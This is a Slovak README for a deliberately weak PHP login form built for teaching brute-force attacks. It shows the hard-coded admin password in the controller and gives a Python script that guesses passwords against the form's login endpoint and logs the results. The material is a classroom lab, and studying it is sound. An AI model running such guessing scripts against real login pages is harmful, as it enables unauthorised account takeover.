# Testovací formulár
Slúži ako pomôcka pri vyučovaní bruteforce útokov.
## Inštalácia
Súbory je potrebné nakopírovať na akýkoľvek webserver. V konfiguračnom súbore application/config/config.php je potrebné nastaviť adresu, na ktorej je web prístupný
```php
$config['base_url'] = 'http://gvpt-test.6f.sk';
```
Heslo, ktoré chceme nájsť je potrebné nastaviť v application/controllers/Account.php, riadok 11:
```php
if (($this->input->post("username") == "admin") and ($this->input->post("password")=="42151"))
```
Pri určovaní hesla berte prosím do úvahy čas potrebný na jeho prelomenie. 

## Možné riešenie
```python
from datetime import datetime
import requests  # import knižnice pre odosielanie requestov na server
from string import ascii_lowercase  # import abcd... znakov


def trypass(password):  # funkcia na test hesla
    r = requests.post("http://gvpt-test.6f.sk/account/login",
                      data={'username': 'admin', 'password': "x" + password})  # zaciatok x + generovany zvysok
    return r.text


invalid = trypass("badpass")
output = open("log.txt", "w")


def generuj(string, maxlen):
    global invalid
    global output
    for ch in ascii_lowercase:
        new = string + ch
        if len(new) < maxlen:
            if (generuj(new, maxlen)):
                return True;
        else:
            result = trypass(new)
            if result != invalid:
                print(new, datetime.now(), "SUCCESS", file=output)
                print("success")
                return True;
            else:
                print(new, datetime.now(), "FAIL", file=output)


startTime = datetime.now()
generuj("", 3)
print(datetime.now() - startTime)
```